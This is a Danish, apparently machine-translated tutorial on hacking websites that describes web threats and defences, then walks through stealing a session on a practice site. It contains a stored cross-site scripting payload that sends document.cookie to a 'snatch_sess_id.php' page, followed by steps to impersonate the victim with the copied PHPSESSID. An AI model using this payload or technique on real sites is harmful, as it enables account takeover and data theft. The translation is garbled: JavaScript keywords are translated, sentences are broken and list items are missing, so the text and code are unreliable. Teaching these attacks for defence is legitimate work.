flere mennesker har adgang til internettet end nogensinde før. Dette har fået mange organisationer til at udvikle internetbaserede applikationer, som brugerne kan bruge online til at interagere med organisationen. Dårligt skrevet kode til internetapplikationer kan udnyttes til at få uautoriseret adgang til følsomme data og internetservere.

i denne tutorial vil du lære at hacke hjemmesider, og vi vil introducere dig til internet applikation hacking teknikker og de modforanstaltninger, du kan sætte på plads for at beskytte mod sådanne angreb.

emner, der er omfattet af denne tutorial

• hvad er en internetapplikation? Hvad er trusler på nettet?
• Sådan beskytter du din hjemmeside mod hacks?
• hjemmeside hacking tricks: Hack en hjemmeside online!

hvad er en hjemmeside? Hvad er trusler på nettet?

en internetapplikation (aka hjemmeside) er en applikation baseret på klientservermodellen. Serveren giver databaseadgang og forretningslogik. Det er hostet på en internetserver. Klientprogrammet kører på klientens netsøgemaskine. Applikationer er normalt skrevet på sprog som Java, C# og VB.Net, PHP, ColdFusion Markup sprog, etc. de databasemotorer, der anvendes i internetapplikationer, omfatter f.eks.

de fleste internetapplikationer hostes på offentlige servere, der er tilgængelige via Internettet. Dette gør dem sårbare over for angreb på grund af let tilgængelighed. Følgende er almindelige trusler mod internetapplikationer. målet med denne trussel kan være at omgå loginalgoritmer, sabotere dataene osv.Denial of Service-angreb– målet med denne trussel kunne være at nægte legitime brugere adgang til ressourcen

Sådan beskytter du din hjemmeside mod hacks?

en organisation kan vedtage følgende politik for at beskytte sig mod internetserverangreb. injektion-desinficering og validering af brugerparametre, inden de sendes til databasen til behandling, kan hjælpe med at reducere chancerne for at blive angrebet via injektion. Databasemotorer som f.eks. støtte parametre, og forberedte udsagn. Denial of Service-angreb – brandvægge kan bruges til at droppe trafik fra mistænkelig IP-adresse, hvis angrebet er en simpel DoS. Korrekt konfiguration af netværk og Intrusion Detection System kan også bidrage til at reducere chancerne for en DoS angreb været en succes.

hjemmeside hacking tricks: Hack en hjemmeside online

i denne hjemmeside hacking praktisk scenario, vi kommer til at kapre brugeren session af internettet Ansøgning placeret på www.techpanda.org. Vi bruger cross site scripting til at læse cookie session id og derefter bruge det til at efterligne en legitim brugersession.

antagelsen er, at angriberen har adgang til internetapplikationen, og han vil gerne kapre sessionerne fra andre brugere, der bruger den samme applikation. Målet med dette angreb kan være at få administratoradgang til internetapplikationen, forudsat at angriberens adgangskonto er begrænset.

Kom godt i gang

• Åbnhttp://www.techpanda.org/
• til praksisformål anbefales det kraftigt at få adgang ved hjælp af injektion. Se denne artikel for at få flere oplysninger om, hvordan du gør det.
• login-e-mailen er, at denne e-mail-adresse bliver beskyttet mod spambots. Du skal have JavaScript aktiveret for at kunne se det., adgangskoden er Adgangskode2010
• hvis du har logget ind med succes, får du følgende dashboard

• Klik på Tilføj ny kontakt
• Indtast følgende som fornavn

<a href=# onclick=\”dokument.placering=\’ http://techpanda.org/snatch_sess_id.php?c=\’+escape \(dokument.cookie\)\;\”>Dark</a>

her,

ovenstående kode bruger JavaScript. Det tilføjer et hyperlink med en onclick begivenhed. Når den intetanende bruger klikker på linket, henter begivenheden PHP cookie session ID og sender det til snatch_sess_id.php side sammen med session id i URL ‘ en

• Indtast de resterende detaljer som vist nedenfor
• Klik på Gem ændringer

• dit dashboard vil nu se ud som følgende skærm

• da cross site script-koden er gemt i databasen, indlæses den hver gang brugere med adgangsrettigheder login
• lad os antage, at administratoren logger ind og klikker på hyperlinket, der siger mørkt
• han/hun får vinduet med sessions-id ‘et, der vises i URL’ en

Bemærk: scriptet kunne sende værdien til en bestemt bruger, der ikke nogle eksterne server, hvor phpsessid er gemt så brugeren omdirigeret tilbage til hjemmesiden, som om intet skete.

Bemærk: den værdi, du får, Kan være forskellig fra den i denne hjemmeside hacking tutorial, men konceptet er det samme

Session efterligning ved hjælp af add-on

rutediagrammet nedenfor viser de trin, du skal tage for at fuldføre denne øvelse.

• du skal bruge til dette afsnit og manipulere data add-on
• Åbn Firefoks og installere Tilføj som vist i diagrammerne nedenfor

• søg efter manipulationsdata, og klik derefter på Installer som vist ovenfor

• klik på på Accepter og installer…

• Klik på Genstart nu, når installationen er afsluttet
• aktiver menulinjen i brand, hvis den ikke vises

• klik på værktøjsmenuen og vælg derefter tamper data som vist nedenfor

• du får følgende vindue. Bemærk: hvis vinduerne ikke er tomme, skal du trykke på knappen Ryd

• Klik på Start Tamper-menuen
• Skift tilbage til Firefoks-netsøgeren, skriv http://www.techpanda.org/dashboard.php tryk derefter på enter-tasten for at indlæse siden
• Du får følgende pop op fra Tamper Data

• pop op-vinduet har tre (3) muligheder. Indstillingen Tamper giver dig mulighed for at ændre HTTP-overskriftsoplysningerne, før de sendes til serveren.
• Klik på det
• Du får følgende vindue

• Kopier PHP session ID du kopierede fra angreb URL og indsæt det efter lighedstegnet. Din værdi skal nu se sådan ud

PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2

• Klik på OK-knappen
• Du får popup-vinduet Tamper data igen

• fjern markeringen i afkrydsningsfeltet, der spørger fortsæt manipulation?
• Klik på Send-knappen, når du er færdig
• du skal kunne se dashboardet som vist nedenfor

Bemærk: vi loggede ikke ind, vi efterlignede en login-session ved hjælp af den PHPSESSID-værdi, vi hentede ved hjælp af cross site scripting

Resume

• en internetapplikation er baseret på server-klientmodellen. På den anden side er det muligt at få adgang til de ressourcer, der findes på serveren.
• applikationer er normalt tilgængelige via Internettet. Dette gør dem sårbare over for angreb.
• internet applikationstrusler omfatter injektion, Kodeinjektion, Defacement, Cookie forgiftning osv.
• en god sikkerhedspolitik, når du udvikler internetapplikationer, kan hjælpe med at gøre dem sikre.